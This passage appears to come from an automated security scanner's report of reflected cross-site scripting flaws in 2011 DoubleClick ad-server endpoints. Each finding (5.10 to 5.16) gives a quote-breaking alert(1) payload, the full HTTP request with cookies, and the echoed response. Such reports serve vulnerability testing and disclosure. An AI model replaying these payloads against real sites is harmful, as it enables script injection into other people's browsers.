Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:16:56 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:16:56 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
U6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-406387893378091293684"-alert(1)-"04063d9d42c&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...
5.10. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78ad2"-alert(1)-"0cffce0ff89 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=178ad2"-alert(1)-"0cffce0ff89&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:15:20 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:15:20 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
wMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=178ad2"-alert(1)-"0cffce0ff89&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...
5.11. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13934"-alert(1)-"2f40d37216e was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A13934"-alert(1)-"2f40d37216e&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:16:11 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:16:11 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A13934"-alert(1)-"2f40d37216e&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...
5.12. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c8a"-alert(1)-"74dc35f103c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=la9c8a"-alert(1)-"74dc35f103c&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:13:57 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:13:57 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad5/f/18f/%2a/p%3B236512240%3B4-0%3B0%3B41471883%3B3454-728/90%3B40692123/40709910/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=la9c8a"-alert(1)-"74dc35f103c&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRt
...[SNIP]...
5.13. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a46e1"-alert(1)-"4aa4ff748f7 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a46e1"-alert(1)-"4aa4ff748f7&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:24 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:24 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a46e1"-alert(1)-"4aa4ff748f7&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3
...[SNIP]...
5.14. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9f72'-alert(1)-'29bf1bc4357 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a9f72'-alert(1)-'29bf1bc4357&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:28 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:28 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a9f72'-alert(1)-'29bf1bc4357&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3
...[SNIP]...
5.15. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33655"-alert(1)-"02dc95746b was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=10966433655"-alert(1)-"02dc95746b&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6995
Date: Sat, 26 Mar 2011 01:38:15 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:15 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3ad6/f/a5/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=10966433655"-alert(1)-"02dc95746b&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell
...[SNIP]...
5.16. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7af1c'-alert(1)-'2429f82e180 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=1096647af1c'-alert(1)-'2429f82e180&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:20 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:20 GMT
Cache-Control: private, x-gzip-ok=""

